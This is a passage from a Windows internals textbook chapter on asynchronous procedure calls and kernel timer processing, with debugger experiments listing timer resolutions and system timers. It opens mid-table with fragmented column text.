du
ler
Ap
cT
er
mi
na
te)
Insert
ed at
the
head
of the
user-
mode
APC
list
Immediately sets the “user APC pending” flag and
follows similar rules as described earlier but delivered at
PASSIVE_LEVEL on return to user mode, no matter
what. It is given arguments returned by the thread-
termination special APC.
Sp
eci
al
(us
er)
Insert
ed at
the
head
of the
user-
mode
APC
Same as above, but arguments are controlled by the caller
of QueueUserAPC2 (NtQueueApcThreadEx2). Kernel
routine is internal KeSpecialUserApcKernelRoutine
function that re-inserts the APC, converting it from the
initial special kernel APC to a special user APC.
list
but
after
the
thread
termi
nates
APC,
if
any.
The executive uses kernel-mode APCs to perform operating system work
that must be completed within the address space (in the context) of a
particular thread. It can use special kernel-mode APCs to direct a thread to
stop executing an interruptible system service, for example, or to record the
results of an asynchronous I/O operation in a thread’s address space.
Environment subsystems use special kernel-mode APCs to make a thread
suspend or terminate itself or to get or set its user-mode execution context.
The Windows Subsystem for Linux (WSL) uses kernel-mode APCs to
emulate the delivery of UNIX signals to Subsystem for UNIX Application
processes.
Another important use of kernel-mode APCs is related to thread
suspension and termination. Because these operations can be initiated from
arbitrary threads and directed to other arbitrary threads, the kernel uses an
APC to query the thread context as well as to terminate the thread. Device
drivers often block APCs or enter a critical or guarded region to prevent
these operations from occurring while they are holding a lock; otherwise, the
lock might never be released, and the system would hang.
Device drivers also use kernel-mode APCs. For example, if an I/O
operation is initiated and a thread goes into a wait state, another thread in
another process can be scheduled to run. When the device finishes
transferring data, the I/O system must somehow get back into the context of
the thread that initiated the I/O so that it can copy the results of the I/O
operation to the buffer in the address space of the process containing that
thread. The I/O system uses a special kernel-mode APC to perform this
action unless the application used the SetFileIoOverlappedRange API or I/O
completion ports. In that case, the buffer will either be global in memory or
copied only after the thread pulls a completion item from the port. (The use
of APCs in the I/O system is discussed in more detail in Chapter 6 of Part 1.)
Several Windows APIs—such as ReadFileEx, WriteFileEx, and
QueueUserAPC—use user-mode APCs. For example, the ReadFileEx and
WriteFileEx functions allow the caller to specify a completion routine to be
called when the I/O operation finishes. The I/O completion is implemented
by queuing an APC to the thread that issued the I/O. However, the callback
to the completion routine doesn’t necessarily take place when the APC is
queued because user-mode APCs are delivered to a thread only when it’s in
an alertable wait state. A thread can enter a wait state either by waiting for
an object handle and specifying that its wait is alertable (with the Windows
WaitForMultipleObjectsEx function) or by testing directly whether it has a
pending APC (using SleepEx). In both cases, if a user-mode APC is pending,
the kernel interrupts (alerts) the thread, transfers control to the APC routine,
and resumes the thread’s execution when the APC routine completes. Unlike
kernel-mode APCs, which can execute at APC_LEVEL, user-mode APCs
execute at PASSIVE_LEVEL.
APC delivery can reorder the wait queues—the lists of which threads are
waiting for what, and in what order they are waiting. (Wait resolution is
described in the section “Low-IRQL synchronization,” later in this chapter.)
If the thread is in a wait state when an APC is delivered, after the APC
routine completes, the wait is reissued or re-executed. If the wait still isn’t
resolved, the thread returns to the wait state, but now it will be at the end of
the list of objects it’s waiting for. For example, because APCs are used to
suspend a thread from execution, if the thread is waiting for any objects, its
wait is removed until the thread is resumed, after which that thread will be at
the end of the list of threads waiting to access the objects it was waiting for.
A thread performing an alertable kernel-mode wait will also be woken up
during thread termination, allowing such a thread to check whether it woke
up as a result of termination or for a different reason.
Timer processing
The system’s clock interval timer is probably the most important device on a
Windows machine, as evidenced by its high IRQL value (CLOCK_LEVEL)
and due to the critical nature of the work it is responsible for. Without this
interrupt, Windows would lose track of time, causing erroneous results in
calculations of uptime and clock time—and worse, causing timers to no
longer expire, and threads never to consume their quantum. Windows would
also not be a preemptive operating system, and unless the current running
thread yielded the CPU, critical background tasks and scheduling could never
occur on a given processor.
Timer types and intervals
Traditionally, Windows programmed the system clock to fire at some
appropriate interval for the machine, and subsequently allowed drivers,
applications, and administrators to modify the clock interval for their needs.
This system clock thus fired in a fixed, periodic fashion, maintained by either
by the Programmable Interrupt Timer (PIT) chip that has been present on all
computers since the PC/AT or the Real Time Clock (RTC). The PIT works
on a crystal that is tuned at one-third the NTSC color carrier frequency
(because it was originally used for TV-Out on the first CGA video cards),
and the HAL uses various achievable multiples to reach millisecond-unit
intervals, starting at 1 ms all the way up to 15 ms. The RTC, on the other
hand, runs at 32.768 kHz, which, by being a power of two, is easily
configured to run at various intervals that are also powers of two. On RTC-
based systems, the APIC Multiprocessor HAL configured the RTC to fire
every 15.6 milliseconds, which corresponds to about 64 times a second.
The PIT and RTC have numerous issues: They are slow, external devices
on legacy buses, have poor granularity, force all processors to synchronize
access to their hardware registers, are a pain to emulate, and are increasingly
no longer found on embedded hardware devices, such as IoT and mobile. In
response, hardware vendors created new types of timers, such as the ACPI
Timer, also sometimes called the Power Management (PM) Timer, and the
APIC Timer (which lives directly on the processor). The ACPI Timer
achieved good flexibility and portability across hardware architectures, but
its latency and implementation bugs caused issues. The APIC Timer, on the
other hand, is highly efficient but is often already used by other platform
needs, such as for profiling (although more recent processors now have
dedicated profiling timers).
In response, Microsoft and the industry created a specification called the
High Performance Event Timer, or HPET, which a much-improved version
of the RTC. On systems with an HPET, it is used instead of the RTC or PIC.
Additionally, ARM64 systems have their own timer architecture, called the
Generic Interrupt Timer (GIT). All in all, the HAL maintains a complex
hierarchy of finding the best possible timer on a given system, using the
following order:
1.
Try to find a synthetic hypervisor timer to avoid any kind of
emulation if running inside of a virtual machine.
2.
On physical hardware, try to find a GIT. This is expected to work
only on ARM64 systems.
3.
If possible, try to find a per-processor timer, such as the Local APIC
timer, if not already used.
4.
Otherwise, find an HPET—going from an MSI-capable HPET to a
legacy periodic HPET to any kind of HPET.
5.
If no HPET was found, use the RTC.
6.
If no RTC is found, try to find some other kind of timer, such as the
PIT or an SFI Timer, first trying to find ones that support MSI
interrupts, if possible.
7.
If no timer has yet been found, the system doesn’t actually have a
Windows compatible timer, which should never happen.
The HPET and the LAPIC Timer have one more advantage—other than
only supporting the typical periodic mode we described earlier, they can also
be configured in a one shot mode. This capability will allow recent versions
of Windows to leverage a dynamic tick model, which we explain later.
Timer granularity
Some types of Windows applications require very fast response times, such
as multimedia applications. In fact, some multimedia tasks require rates as
low as 1 ms. For this reason, Windows from early on implemented APIs and
mechanisms that enable lowering the interval of the system’s clock interrupt,
which results in more frequent clock interrupts. These APIs do not adjust a
particular timer’s specific rate (that functionality was added later, through
enhanced timers, which we cover in an upcoming section); instead, they end
up increasing the resolution of all timers in the system, potentially causing
other timers to expire more frequently, too.
That being said, Windows tries its best to restore the clock timer back to
its original value whenever it can. Each time a process requests a clock
interval change, Windows increases an internal reference count and
associates it with the process. Similarly, drivers (which can also change the
clock rate) get added to the global reference count. When all drivers have
restored the clock and all processes that modified the clock either have exited
or restored it, Windows restores the clock to its default value (or barring that,
to the next highest value that’s been required by a process or driver).
EXPERIMENT: Identifying high-frequency timers
Due to the problems that high-frequency timers can cause,
Windows uses Event Tracing for Windows (ETW) to trace all
processes and drivers that request a change in the system’s clock
interval, displaying the time of the occurrence and the requested
interval. The current interval is also shown. This data is of great use
to both developers and system administrators in identifying the
causes of poor battery performance on otherwise healthy systems,
as well as to decrease overall power consumption on large systems.
To obtain it, simply run powercfg /energy, and you should obtain
an HTML file called energy-report.html, similar to the one shown
here:
Scroll down to the Platform Timer Resolution section, and you
see all the applications that have modified the timer resolution and
are still active, along with the call stacks that caused this call.
Timer resolutions are shown in hundreds of nanoseconds, so a
period of 20,000 corresponds to 2 ms. In the sample shown, two
applications—namely, Microsoft Edge and the TightVNC remote
desktop server—each requested a higher resolution.
You can also use the debugger to obtain this information. For
each process, the EPROCESS structure contains the fields shown
next that help identify changes in timer resolution:
Click here to view code image
+0x4a8 TimerResolutionLink : _LIST_ENTRY [
0xfffffa80’05218fd8 - 0xfffffa80’059cd508 ]
+0x4b8 RequestedTimerResolution : 0
+0x4bc ActiveThreadsHighWatermark : 0x1d
+0x4c0 SmallestTimerResolution : 0x2710
+0x4c8 TimerResolutionStackRecord : 0xfffff8a0’0476ecd0
_PO_DIAG_STACK_RECORD
Note that the debugger shows you an additional piece of
information: the smallest timer resolution that was ever requested
by a given process. In this example, the process shown corresponds
to PowerPoint 2010, which typically requests a lower timer
resolution during slideshows but not during slide editing mode. The
EPROCESS fields of PowerPoint, shown in the preceding code,
prove this, and the stack could be parsed by dumping the
PO_DIAG_STACK_RECORD structure.
Finally, the TimerResolutionLink field connects all processes
that have made changes to timer resolution, through the
ExpTimerResolutionListHead doubly linked list. Parsing this list
with the debugger data model can reveal all processes on the
system that have, or had, made changes to the timer resolution,
when the powercfg command is unavailable or information on past
processes is required. For example, this output shows that Edge, at
various points, requested a 1 ms resolution, as did the Remote
Desktop Client, and Cortana. WinDbg Preview, however, now only
previously requested it but is still requesting it at the moment this
command was written.
Click here to view code image
lkd> dx -g Debugger.Utility.Collections.FromListEntry(*
(nt!_LIST_ENTRY*)&nt!ExpTimerReso
lutionListHead, "nt!_EPROCESS",
"TimerResolutionLink").Select(p => new { Name = ((char*)
p.ImageFileName).ToDisplayString("sb"), Smallest =
p.SmallestTimerResolution, Requested =
p.RequestedTimerResolution}),d
======================================================
= = Name = Smallest = Requested =
======================================================
= [0] - msedge.exe - 10000 - 0 =
= [1] - msedge.exe - 10000 - 0 =
= [2] - msedge.exe - 10000 - 0 =
= [3] - msedge.exe - 10000 - 0 =
= [4] - mstsc.exe - 10000 - 0 =
= [5] - msedge.exe - 10000 - 0 =
= [6] - msedge.exe - 10000 - 0 =
= [7] - msedge.exe - 10000 - 0 =
= [8] - DbgX.Shell.exe - 10000 - 10000 =
= [9] - msedge.exe - 10000 - 0 =
= [10] - msedge.exe - 10000 - 0 =
= [11] - msedge.exe - 10000 - 0 =
= [12] - msedge.exe - 10000 - 0 =
= [13] - msedge.exe - 10000 - 0 =
= [14] - msedge.exe - 10000 - 0 =
= [15] - msedge.exe - 10000 - 0 =
= [16] - msedge.exe - 10000 - 0 =
= [17] - msedge.exe - 10000 - 0 =
= [18] - msedge.exe - 10000 - 0 =
= [19] - SearchApp.exe - 40000 - 0 =
======================================================
Timer expiration
As we said, one of the main tasks of the ISR associated with the interrupt that
the clock source generates is to keep track of system time, which is mainly
done by the KeUpdateSystemTime routine. Its second job is to keep track of
logical run time, such as process/thread execution times and the system tick
time, which is the underlying number used by APIs such as GetTickCount
that developers use to time operations in their applications. This part of the
work is performed by KeUpdateRunTime. Before doing any of that work,
however, KeUpdateRunTime checks whether any timers have expired.
Windows timers can be either absolute timers, which implies a distinct
expiration time in the future, or relative timers, which contain a negative
expiration value used as a positive offset from the current time during timer
insertion. Internally, all timers are converted to an absolute expiration time,
although the system keeps track of whether this is the “true” absolute time or
a converted relative time. This difference is important in certain scenarios,
such as Daylight Savings Time (or even manual clock changes). An absolute
timer would still fire at 8:00 p.m. if the user moved the clock from 1:00 p.m.
to 7:00 p.m., but a relative timer—say, one set to expire “in two hours”—
would not feel the effect of the clock change because two hours haven’t
really elapsed. During system time-change events such as these, the kernel
reprograms the absolute time associated with relative timers to match the
new settings.
Back when the clock only fired in a periodic mode, since its expiration was
at known interval multiples, each multiple of the system time that a timer
could be associated with is an index called a hand, which is stored in the
timer object’s dispatcher header. Windows used that fact to organize all
driver and application timers into linked lists based on an array where each
entry corresponds to a possible multiple of the system time. Because modern
versions of Windows 10 no longer necessarily run on a periodic tick (due to
the dynamic tick functionality), a hand has instead been redefined as the
upper 46 bits of the due time (which is in 100 ns units). This gives each hand
an approximate “time” of 28 ms. Additionally, because on a given tick
(especially when not firing on a fixed periodic interval), multiple hands could
have expiring timers, Windows can no longer just check the current hand.
Instead, a bitmap is used to track each hand in each processor’s timer table.
These pending hands are found using the bitmap and checked during every
clock interrupt.
Regardless of method, these 256 linked lists live in what is called the timer
table—which is in the PRCB—enabling each processor to perform its own
independent timer expiration without needing to acquire a global lock, as
shown in Figure 8-19. Recent builds of Windows 10 can have up to two
timer tables, for a total of 512 linked lists.
Figure 8-19 Example of per-processor timer lists.
Later, you will see what determines which logical processor’s timer table a
timer is inserted on. Because each processor has its own timer table, each
processor also does its own timer expiration work. As each processor gets
initialized, the table is filled with absolute timers with an infinite expiration
time to avoid any incoherent state. Therefore, to determine whether a clock
has expired, it is only necessary to check if there are any timers on the linked
list associated with the current hand.
Although updating counters and checking a linked list are fast operations,
going through every timer and expiring it is a potentially costly operation—
keep in mind that all this work is currently being performed at
CLOCK_LEVEL, an exceptionally elevated IRQL. Similar to how a driver
ISR queues a DPC to defer work, the clock ISR requests a DPC software
interrupt, setting a flag in the PRCB so that the DPC draining mechanism
knows timers need expiration. Likewise, when updating process/thread
runtime, if the clock ISR determines that a thread has expired its quantum, it
also queues a DPC software interrupt and sets a different PRCB flag. These
flags are per-PRCB because each processor normally does its own processing
of run-time updates because each processor is running a different thread and
has different tasks associated with it. Table 8-10 displays the various fields
used in timer expiration and processing.
Table 8-10 Timer processing KPRCB fields
KPRCB
Field
Type
Description
LastTime
rHand
Index
(up to
256)
The last timer hand that was processed by this
processor. In recent builds, part of TimerTable
because there are now two tables.
ClockOw
ner
Boole
an
Indicates whether the current processor is the
clock owner.
TimerTab
le
KTI
MER
_TA
BLE
List heads for the timer table lists (256, or 512 on
more recent builds).
DpcNorm
alTimerE
xpiration
Bit
Indicates that a DISPATCH_LEVEL interrupt has
been raised to request timer expiration.
DPCs are provided primarily for device drivers, but the kernel uses them,
too. The kernel most frequently uses a DPC to handle quantum expiration. At
every tick of the system clock, an interrupt occurs at clock IRQL. The clock
interrupt handler (running at clock IRQL) updates the system time and then
decrements a counter that tracks how long the current thread has run. When
the counter reaches 0, the thread’s time quantum has expired, and the kernel
might need to reschedule the processor, a lower-priority task that should be
done at DPC/dispatch IRQL. The clock interrupt handler queues a DPC to
initiate thread dispatching and then finishes its work and lowers the
processor’s IRQL. Because the DPC interrupt has a lower priority than do
device interrupts, any pending device interrupts that surface before the clock
interrupt completes are handled before the DPC interrupt occurs.
Once the IRQL eventually drops back to DISPATCH_LEVEL, as part of
DPC processing, these two flags will be picked up.
Chapter 4 of Part 1 covers the actions related to thread scheduling and
quantum expiration. Here, we look at the timer expiration work. Because the
timers are linked together by hand, the expiration code (executed by the DPC
associated with the PRCB in the TimerExpirationDpc field, usually
KiTimerExpirationDpc) parses this list from head to tail. (At insertion time,
the timers nearest to the clock interval multiple will be first, followed by
timers closer and closer to the next interval but still within this hand.) There
are two primary tasks to expiring a timer:
■ The timer is treated as a dispatcher synchronization object (threads
are waiting on the timer as part of a timeout or directly as part of a
wait). The wait-testing and wait-satisfaction algorithms will be run on
the timer. This work is described in a later section on synchronization
in this chapter. This is how user-mode applications, and some drivers,
make use of timers.
■ The timer is treated as a control object associated with a DPC
callback routine that executes when the timer expires. This method is
reserved only for drivers and enables very low latency response to
timer expiration. (The wait/dispatcher method requires all the extra
logic of wait signaling.) Additionally, because timer expiration itself
executes at DISPATCH_LEVEL, where DPCs also run, it is perfectly
suited as a timer callback.
As each processor wakes up to handle the clock interval timer to perform
system-time and run-time processing, it therefore also processes timer
expirations after a slight latency/delay in which the IRQL drops from
CLOCK_LEVEL to DISPATCH_LEVEL. Figure 8-20 shows this behavior on
two processors—the solid arrows indicate the clock interrupt firing, whereas
the dotted arrows indicate any timer expiration processing that might occur if
the processor had associated timers.
Figure 8-20 Timer expiration.
Processor selection
A critical determination that must be made when a timer is inserted is to pick
the appropriate table to use—in other words, the most optimal processor
choice. First, the kernel checks whether timer serialization is disabled. If it is,
it then checks whether the timer has a DPC associated with its expiration, and
if the DPC has been affinitized to a target processor, in which case it selects
that processor’s timer table. If the timer has no DPC associated with it, or if
the DPC has not been bound to a processor, the kernel scans all processors in
the current processor’s group that have not been parked. (For more
information on core parking, see Chapter 4 of Part 1.) If the current processor
is parked, it picks the next closest neighboring unparked processor in the
same NUMA node; otherwise, the current processor is used.
This behavior is intended to improve performance and scalability on server
systems that make use of Hyper-V, although it can improve performance on
any heavily loaded system. As system timers pile up—because most drivers
do not affinitize their DPCs—CPU 0 becomes more and more congested with
the execution of timer expiration code, which increases latency and can even
cause heavy delays or missed DPCs. Additionally, timer expiration can start
competing with DPCs typically associated with driver interrupt processing,
such as network packet code, causing systemwide slowdowns. This process
is exacerbated in a Hyper-V scenario, where CPU 0 must process the timers
and DPCs associated with potentially numerous virtual machines, each with
their own timers and associated devices.
By spreading the timers across processors, as shown in Figure 8-21, each
processor’s timer-expiration load is fully distributed among unparked logical
processors. The timer object stores its associated processor number in the
dispatcher header on 32-bit systems and in the object itself on 64-bit systems.
Figure 8-21 Timer queuing behaviors.
This behavior, although highly beneficial on servers, does not typically
affect client systems that much. Additionally, it makes each timer expiration
event (such as a clock tick) more complex because a processor may have
gone idle but still have had timers associated with it, meaning that the
processor(s) still receiving clock ticks need to potentially scan everyone
else’s processor tables, too. Further, as various processors may be cancelling
and inserting timers simultaneously, it means there’s inherent asynchronous
behaviors in timer expiration, which may not always be desired. This
complexity makes it nearly impossible to implement Modern Standby’s
resiliency phase because no one single processor can ultimately remain to
manage the clock. Therefore, on client systems, timer serialization is enabled
if Modern Standby is available, which causes the kernel to choose CPU 0 no
matter what. This allows CPU 0 to behave as the default clock owner—the
processor that will always be active to pick up clock interrupts (more on this
later).
Note
This behavior is controlled by the kernel variable
KiSerializeTimerExpiration, which is initialized based on a registry
setting whose value is different between a server and client installation.
By modifying or creating the value SerializeTimerExpiration under
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel
and setting it to any value other than 0 or 1, serialization can be disabled,
enabling timers to be distributed among processors. Deleting the value, or
keeping it as 0, allows the kernel to make the decision based on Modern
Standby availability, and setting it to 1 permanently enables serialization
even on non-Modern Standby systems.
EXPERIMENT: Listing system timers
You can use the kernel debugger to dump all the current registered
timers on the system, as well as information on the DPC associated
with each timer (if any). See the following output for a sample:
Click here to view code image
0: kd> !timer
Dump system timers
Interrupt time: 250fdc0f 00000000 [12/21/2020 03:30:27.739]
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 0 -
High precision)
List Timer Interrupt Low/High Fire Time
DPC/thread
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 1 -
Standard)
List Timer Interrupt Low/High Fire Time
DPC/thread
1 ffffdb08d6b2f0b0 0807e1fb 80000000 [ NEVER
] thread ffffdb08d748f480
4 ffffdb08d7837a20 6810de65 00000008 [12/21/2020
04:29:36.127]
6 ffffdb08d2cfc6b0 4c18f0d1 00000000 [12/21/2020
03:31:33.230] netbt!TimerExpiry
(DPC @ ffffdb08d2cfc670)
fffff8011fd3d8a8 A fc19cdd1 00589a19 [ 1/ 1/2100
00:00:00.054] nt!ExpCenturyDpcRoutine
(DPC @ fffff8011fd3d868)
7 ffffdb08d8640440 3b22a3a3 00000000 [12/21/2020
03:31:04.772] thread ffffdb08d85f2080
ffffdb08d0fef300 7723f6b5 00000001 [12/21/2020
03:39:54.941]
FLTMGR!FltpIrpCtrlStackProfilerTimer (DPC @
ffffdb08d0fef340)
11 fffff8011fcffe70 6c2d7643 00000000 [12/21/2020
03:32:27.052] nt!KdpTimeSlipDpcRoutine
(DPC @ fffff8011fcffe30)
ffffdb08d75f0180 c42fec8e 00000000 [12/21/2020
03:34:54.707] thread ffffdb08d75f0080
14 fffff80123475420 283baec0 00000000 [12/21/2020
03:30:33.060] tcpip!IppTimeout
(DPC @ fffff80123475460)
. . .
58 ffffdb08d863e280 P 3fec06d0 00000000 [12/21/2020
03:31:12.803] thread ffffdb08d8730080
fffff8011fd3d948 A 90eb4dd1 00000887 [ 1/ 1/2021
00:00:00.054] nt!ExpNextYearDpcRoutine
(DPC @ fffff8011fd3d908)
. . .
104 ffffdb08d27e6d78 P 25a25441 00000000 [12/21/2020
03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6d38)
ffffdb08d27e6f10 P 25a25441 00000000 [12/21/2020
03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6ed0)
106 ffffdb08d29db048 P 251210d3 00000000 [12/21/2020
03:30:27.754]
CLASSPNP!ClasspCleanupPacketTimerDpc (DPC @
ffffdb08d29db088)
fffff80122e9d110 258f6e00 00000000 [12/21/2020
03:30:28.575]
Ntfs!NtfsVolumeCheckpointDpc (DPC @ fffff80122e9d0d0)
108 fffff8011c6e6560 19b1caef 00000002 [12/21/2020
03:44:27.661]
tm!TmpCheckForProgressDpcRoutine (DPC @ fffff8011c6e65a0)
111 ffffdb08d27d5540 P 25920ab5 00000000 [12/21/2020
03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27d5580)
ffffdb08d27da540 P 25920ab5 00000000 [12/21/2020
03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27da580)
. . .
Total Timers: 221, Maximum List: 8
Current Hand: 139
In this example, which has been shortened for space reasons,
there are multiple driver-associated timers, due to expire shortly,
associated with the Netbt.sys and Tcpip.sys drivers (both related to
networking), as well as Ntfs, the storage controller driver drivers.
There are also background housekeeping timers due to expire, such
as those related to power management, ETW, registry flushing, and
Users Account Control (UAC) virtualization. Additionally, there
are a dozen or so timers that don’t have any DPC associated with
them, which likely indicates user-mode or kernel-mode timers that
are used for wait dispatching. You can use !thread on the thread
pointers to verify this.
Finally, three interesting timers that are always present on a
Windows system are the timer that checks for Daylight Savings
Time time-zone changes, the timer that checks for the arrival of the
upcoming year, and the timer that checks for entry into the next
century. One can easily locate them based on their typically distant
expiration time, unless this experiment is performed on the eve of
one of these events.
Intelligent timer tick distribution
Figure 8-20, which shows processors handling the clock ISR and expiring
timers, reveals that processor 1 wakes up several times (the solid arrows)
even when there are no associated expiring timers (the dotted arrows).
Although that behavior is required as long as processor 1 is running (to
update the thread/process run times and scheduling state), what if processor 1
is idle (and has no expiring timers)? Does it still need to handle the clock
interrupt? Because the only other work required that was referenced earlier is
to update the overall system time/clock ticks, it’s sufficient to designate
merely one processor as the time-keeping processor (in this case, processor 0)
and allow other processors to remain in their sleep state; if they wake, any
time-related adjustments can be performed by resynchronizing with processor
0.
Windows does, in fact, make this realization (internally called intelligent
timer tick distribution), and Figure 8-22 shows the processor states under the
scenario where processor 1 is sleeping (unlike earlier, when we assumed it
was running code). As you can see, processor 1 wakes up only five times to
handle its expiring timers, creating a much larger gap (sleeping period). The
kernel uses a variable KiPendingTimerBitmaps, which contains an array of
affinity mask structures that indicate which logical processors need to receive
a clock interval for the given timer hand (clock-tick interval). It can then
appropriately program the interrupt controller, as well as determine to which
processors it will send an IPI to initiate timer processing.
Figure 8-22 Intelligent timer tick distribution applied to processor 1.
Leaving as large a gap as possible is important due to the way power
management works in processors: as the processor detects that the workload
is going lower and lower, it decreases its power consumption (P states), until
it finally reaches an idle state. The processor then can selectively turn off
parts of itself and enter deeper and deeper idle/sleep states, such as turning
off caches. However, if the processor has to wake again, it will consume
energy and take time to power up; for this reason, processor designers will
risk entering these lower idle/sleep states (C-states) only if the time spent in a
given state outweighs the time and energy it takes to enter and exit the state.
Obviously, it makes no sense to spend 10 ms to enter a sleep state that will
last only 1 ms. By preventing clock interrupts from waking sleeping
processors unless needed (due to timers), they can enter deeper C-states and
stay there longer.
Timer coalescing
Although minimizing clock interrupts to sleeping processors during periods
of no timer expiration gives a big boost to longer C-state intervals, with a
timer granularity of 15 ms, many timers likely will be queued at any given
hand and expire often, even if just on processor 0. Reducing the amount of
software timer-expiration work would both help to decrease latency (by
requiring less work at DISPATCH_LEVEL) as well as allow other processors
to stay in their sleep states even longer. (Because we’ve established that the
processors wake up only to handle expiring timers, fewer timer expirations
result in longer sleep times.) In truth, it is not just the number of expiring
timers that really affects sleep state (it does affect latency), but the periodicity
of these timer expirations—six timers all expiring at the same hand is a better
option than six timers expiring at six different hands. Therefore, to fully
optimize idle-time duration, the kernel needs to employ a coalescing
mechanism to combine separate timer hands into an individual hand with
multiple expirations.
Timer coalescing works on the assumption that most drivers and user-
mode applications do not particularly care about the exact firing period of
their timers (except in the case of multimedia applications, for example).
This “don’t care” region grows as the original timer period grows—an
application waking up every 30 seconds probably doesn’t mind waking up
every 31 or 29 seconds instead, while a driver polling every second could
probably poll every second plus or minus 50 ms without too many problems.
The important guarantee most periodic timers depend on is that their firing
period remains constant within a certain range—for example, when a timer
has been changed to fire every second plus 50 ms, it continues to fire within
that range forever, not sometimes at every two seconds and other times at
half a second. Even so, not all timers are ready to be coalesced into coarser
granularities, so Windows enables this mechanism only for timers that have
marked themselves as coalescable, either through the
KeSetCoalescableTimer kernel API or through its user-mode counterpart,
SetWaitableTimerEx.
With these APIs, driver and application developers are free to provide the
kernel with the maximum tolerance (or tolerably delay) that their timer will
endure, which is defined as the maximum amount of time past the requested
period at which the timer will still function correctly. (In the previous
example, the 1-second timer had a tolerance of 50 ms.) The recommended
minimum tolerance is 32 ms, which corresponds to about twice the 15.6 ms
clock tick—any smaller value wouldn’t really result in any coalescing
because the expiring timer could not be moved even from one clock tick to
the next. Regardless of the tolerance that is specified, Windows aligns the
timer to one of four preferred coalescing intervals: 1 second, 250 ms, 100
ms, or 50 ms.
When a tolerable delay is set for a periodic timer, Windows uses a process
called shifting, which causes the timer to drift between periods until it gets
aligned to the most optimal multiple of the period interval within the
preferred coalescing interval associated with the specified tolerance (which is
then encoded in the dispatcher header). For absolute timers, the list of
preferred coalescing intervals is scanned, and a preferred expiration time is
generated based on the closest acceptable coalescing interval to the
maximum tolerance the caller specified. This behavior means that absolute
timers are always pushed out as far as possible past their real expiration
point, which spreads out timers as far as possible and creates longer sleep
times on the processors.
Now with timer coalescing, refer to Figure 8-20 and assume all the timers
specified tolerances and are thus coalescable. In one scenario, Windows
could decide to coalesce the timers as shown in Figure 8-23. Notice that now,
processor 1 receives a total of only three clock interrupts, significantly
increasing the periods of idle sleep, thus achieving a lower C-state.
Furthermore, there is less work to do for some of the clock interrupts on
processor 0, possibly removing the latency of requiring a drop
to DISPATCH_LEVEL at each clock interrupt.
Figure 8-23 Timer coalescing.
Enhanced timers
Enhanced timers were introduced to satisfy a long list of requirements that
previous timer system improvements had still not yet addressed. For one,
although timer coalescing reduced power usage, it also made timers have
inconsistent expiration times, even when there was no need to reduce power
(in other words, coalescing was an all-or-nothing proposition). Second, the
only mechanism in Windows for high-resolution timers was for applications
and drivers to lower the clock tick globally, which, as we’ve seen, had
significant negative impact on systems. And, ironically, even though the
resolution of these timers was now higher, they were not necessarily more
precise because regular time expiration can happen before the clock tick,
regardless of how much more granular it’s been made.
Finally, recall that the introduction of Connected/Modern Standby,
described in Chapter 6 of Part 1, added features such as timer virtualization
and the Desktop Activity Moderator (DAM), which actively delay the
expiration of timers during the resiliency phase of Modern Standby to
simulate S3 sleep. However, some key system timer activity must still be
permitted to periodically run even during this phase.
These three requirements led to the creation of enhanced timers, which are
also internally known as Timer2 objects, and the creation of new system calls
such as NtCreateTimer2 and NtSetTimer2, as well as driver APIs such as
ExAllocateTimer and ExSetTimer. Enhanced timers support four modes of
behavior, some of which are mutually exclusive:
■ No-wake This type of enhanced timer is an improvement over timer
coalescing because it provides for a tolerable delay that is only used
in periods of sleep.
■ High-resolution This type of enhanced timer corresponds to a high-
resolution timer with a precise clock rate that is dedicated to it. The
clock rate will only need to run at this speed when approaching the
expiration of the timer.
■ Idle-resilient This type of enhanced timer is still active even during
deep sleep, such as the resiliency phase of modern standby.
■ Finite This is the type for enhanced timers that do not share one of
the previously described properties.
High-resolution timers can also be idle resilient, and vice-versa. Finite
timers, on the other hand, cannot have any of the described properties.
Therefore, if finite enhanced timers do not have any “special” behavior, why
create them at all? It turns out that since the new Timer2 infrastructure was a
rewrite of the legacy timer logic that’s been there since the start of the
kernel’s life, it includes a few other benefits regardless of any special
functionality:
■ It uses self-balancing red-black binary trees instead of the linked lists
that form the timer table.
■ It allows drivers to specify an enable and disable callback without
worrying about manually creating DPCs.
■ It includes new, clean, ETW tracing entries for each operation, aiding
in troubleshooting.
■ It provides additional security-in-depth through certain pointer
obfuscation techniques and additional assertions, hardening against
data-only exploits and corruption.
Therefore, driver developers that are only targeting Windows 8.1 and later
are highly recommended to use the new enhanced timer infrastructure, even
if they do not require the additional capabilities.
Note
The documented ExAllocateTimer API does not allow drivers to create
idle-resilient timers. In fact, such an attempt crashes the system. Only
Microsoft inbox drivers can create such timers through the
ExAllocateTimerInternal API. Readers are discouraged from attempting
to use this API because the kernel maintains a static, hard-coded list of
every known legitimate caller, tracked by a unique identifier that must be
provided, and further has knowledge of how many such timers the
component is allowed to create. Any violations result in a system crash
(blue screen of death).
Enhanced timers also have a more complex set of expiration rules than
regular timers because they end up having two possible due times. The first,
called the minimum due time, specifies the earliest system clock time at
which point the timer is allowed to expire. The second, maximum due time, is
the latest system clock time at which the timer should ever expire. Windows
guarantees that the timer will expire somewhere between these two points in
time, either because of a regular clock tick every interval (such as 15 ms), or
because of an ad-hoc check for timer expiration (such as the one that the idle
thread does upon waking up from an interrupt). This interval is computed by
taking the expected expiration time passed in by the developer and adjusting
for the possible “no wake tolerance” that was passed in. If unlimited wake
tolerance was specified, then the timer does not have a maximum due time.
As such, a Timer2 object lives in potentially up to two red-black tree nodes
—node 0, for the minimum due time checks, and node 1, for the maximum
due time checks. No-wake and high-resolution timers live in node 0, while
finite and idle-resilient timers live in node 1.
Since we mentioned that some of these attributes can be combined, how
does this fit in with the two nodes? Instead of a single red-black tree, the
system obviously needs to have more, which are called collections (see the
public KTIMER2_COLLECTION_INDEX data structure), one for each type
of enhanced timer we’ve seen. Then, a timer can be inserted into node 0 or
node 1, or both, or neither, depending on the rules and combinations shown
in Table 8-11.
Table 8-11 Timer types and node collection indices
Timer type
Node 0
collection index
Node 1 collection index
No-wake
NoWake, if it has
NoWake, if it has a non-
a tolerance
unlimited or no tolerance
Finite
Never inserted in
this node
Finite
High-resolution
Hr, always
Finite, if it has a non-
